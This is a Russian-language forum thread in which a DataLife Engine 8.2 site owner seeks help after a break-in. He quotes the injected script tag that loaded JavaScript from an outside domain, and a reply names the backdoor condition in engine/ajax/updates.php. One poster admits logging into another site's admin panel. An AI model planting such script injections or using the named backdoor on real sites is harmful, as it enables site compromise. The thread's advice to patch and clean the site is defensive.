Нужна помощь ломают сайт

Discussion in 'Песочница' started by IOzer, 9 Dec 2009.

  1. IOzer

    IOzer New Member

    Joined:
    7 Dec 2009
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    В общем проблемка такая. Недавно захожу на свой сайт и на своё удивление вижу что от куда то появилась рекламма кликандера. Попытался воити под админским аккаунтом, но так и не смог кто то сменил пароль, вобщем я воспользовался восстановлением пароля на e-mail зашёл в админку и нашёл в шаблоне такой код:
    Code:
    <script language='javascript' type='text/javascript' src='http://softxx.ru/m'></script>
    посмотрел с какого IP последний раз заходили в админку 81.222.236.109
    Информация об ip-адресе 81.222.236.109

    % This is the RIPE Database query service.
    % The objects are in RPSL format.
    %
    % The RIPE Database is subject to Terms and Conditions.
    % See http://www.ripe.net/db/support/db-terms-conditions.pdf

    % Note: This output has been filtered.
    % To receive output for a database update, use the "-B" flag.

    % Information related to '81.222.236.0 - 81.222.236.255'

    inetnum: 81.222.236.0 - 81.222.236.255
    netname: TimeWeb
    descr: Hosting Service Provider
    country: RU
    admin-c: AAB74-RIPE
    tech-c: AAB74-RIPE
    status: ASSIGNED PA
    mnt-by: ELTEL-RIPE-MNT
    source: RIPE # Filtered

    person: Alexandr A Boykov
    address: 13, Sedova st.
    address: 192148, Saint-Petersburg
    address: Russia
    phone: +7 812 3341520
    fax-no: +7 812 3341530
    abuse-mailbox: [email protected]
    nic-hdl: AAB74-RIPE
    mnt-by: ELTEL-RIPE-MNT
    source: RIPE # Filtered

    % Information related to '81.222.192.0/18AS20597'

    route: 81.222.192.0/18
    descr: ELTEL.net
    origin: AS20597
    mnt-by: ELTEL-RIPE-MNT
    source: RIPE # Filtered

    Как я понял что кто то c VDS на TimeWebe ломает
    Пробовал переименовать файл admin.php, но к сожалению не помогло сейчас снова ломанули
    хочу сейчас права на запись main.tpl убрать незнаю поможет или нет :(
    Подскажите что можно поделать сайт стоит на DLE
     
  2. antibiotic

    antibiotic [ таблетка ]

    Joined:
    13 Jul 2009
    Messages:
    620
    Likes Received:
    520
    Reputations:
    245
    обновить версию дле
     
    _________________________
  3. Thenno

    Thenno Member

    Joined:
    3 Jul 2009
    Messages:
    77
    Likes Received:
    21
    Reputations:
    0
    Попробуй DLE обновить и попроси кого-нибудь из прошареных знакомых сайт на уязвимости проверить, может найдете дырку, через которую зараза лезет.
     
  4. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    смотри логи, мож найдеш чего интересного ;)
     
  5. IOzer

    IOzer New Member

    Joined:
    7 Dec 2009
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    версия DLE 8.2
    дело в том что у меня есть ещё пару сайтов на dle они на более старых версиях, но там всё нормально никто не ломает
    кстати сейчас погуглил нашёл http://devilstar.habrahabr.ru/blog/76359/ видимо не только у меня такая проблемка
     
  6. gisTy

    gisTy Elder - Старейшина

    Joined:
    24 May 2008
    Messages:
    432
    Likes Received:
    160
    Reputations:
    27
    http://drtro.name/249-dle-8-2-nedostatochnye-filtraciya-v-praktike/
    обнови свой дле
     
  7. sir95

    sir95 New Member

    Joined:
    30 Nov 2009
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Точно такая проблема была сайт ломали по 3-4 раза на день! Поставил 8.3 всё нормально!
     
    #7 sir95, 30 Dec 2009
    Last edited: 30 Dec 2009
  8. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    http://forum.antichat.ru/showpost.php?p=1683160&postcount=83
    хм
     
  9. LaMer0n

    LaMer0n Elder - Старейшина

    Joined:
    25 Mar 2006
    Messages:
    119
    Likes Received:
    8
    Reputations:
    -2
    средствами сервера поставь пароль на папку с админкой, с самим файлом .htaccess гемороится не советую, если есть директ админ - там это сделать очень просто.
     
  10. GL_Loney

    GL_Loney New Member

    Joined:
    19 Jun 2009
    Messages:
    54
    Likes Received:
    1
    Reputations:
    -10
    В DLE 8.2 в одном из компонентов движка шелл.
    Настоятельно рекомендую проверить файлик, лежащий по адресу - engine/ajax/updates.php
    Ищем там такую шнягу - if($_GET['wert']=='')
    Измени/обнови файл.
    В следующий раз качай нуллы из достоверных источников.
     
  11. winlogon.exe

    winlogon.exe Active Member

    Joined:
    5 Jun 2009
    Messages:
    31
    Likes Received:
    129
    Reputations:
    13
    версия 8.2 сильно уязвима.
    Давно надо было обновить двиг. Я когда то так по гуглил сайты с 8.2 и попался мне сайт хотснига... попал в админку. че тон е стал атм ничего токого делать и написал админу в аську чтобы обновил двиг ^^
     
  12. N0_oB

    N0_oB Member

    Joined:
    30 Jan 2010
    Messages:
    21
    Likes Received:
    81
    Reputations:
    30
    ТС несколько ЭЛЕМЕНТАРНЫХ советов по обеспечению безопасности Вашего портала:
    1 Качайте ВСЕ дополнения, обновления, и базовые версии скриптов ТОЛЬКО С ОФФ САЙТА РАЗРАБОТЧИКОВ
    2 Внимательно следи за обновлениями и новостями офф сайта, т.к если и найдуться какие то ошибки в коде которые открывают уязвимости, то в первую очередь они опубликуються на офф сайте, а не где либо еще.
    3 Не совершай быстрый переход по ссылкам которые тебе подсовывают незнакомые люди. думаю причину объяснять не нужно...
    4 не пользуйся говнохостами, на моей практике до 70% взломов было через хостинг. Лично я уделяю огромное внимание выбору хостинга.
     
  13. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    5. Нанять специалиста который вычистит все шеллы и бекдоры и забыть все, что написано выше
     
  14. N0_oB

    N0_oB Member

    Joined:
    30 Jan 2010
    Messages:
    21
    Likes Received:
    81
    Reputations:
    30
    это дорогое удовольствие)) не у всех есть возможность платить за работу подобного рода. + надо самому учиться... и все подобные траблы можно было бы предотвратить, если бы ТС больше юзал офф сайт
     
  15. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    Вычистить шшелы и бэкдры )))) 1мб кодв 20к итого ДЛЕ весит около 4мб - соответсвенно проверить на шшелы будит стоить 80 т.р ))) да нахер оно надо ))) лучше лицуху взять ))
     
  16. wovo4ka

    wovo4ka New Member

    Joined:
    2 Jan 2011
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    Здрасти всем...
    тут такой вопрос созрел, у друга ломают сайт на mobileCMS... я (как начинающий кодер на php) помогал ему с сайтом и закрывал дыры, которые находил... но это так сказать любительский уровень... подскажите, как на готовом сайте, залитом на хост, можно найти дыры, баги, шеллы и бекдоры? мне бы теорию с азов почитать, но вот найти не могу... если где-то на античате есть ответ, дайте ссыль, пожалуйста ...

    спасибо...
     
    1 person likes this.
Loading...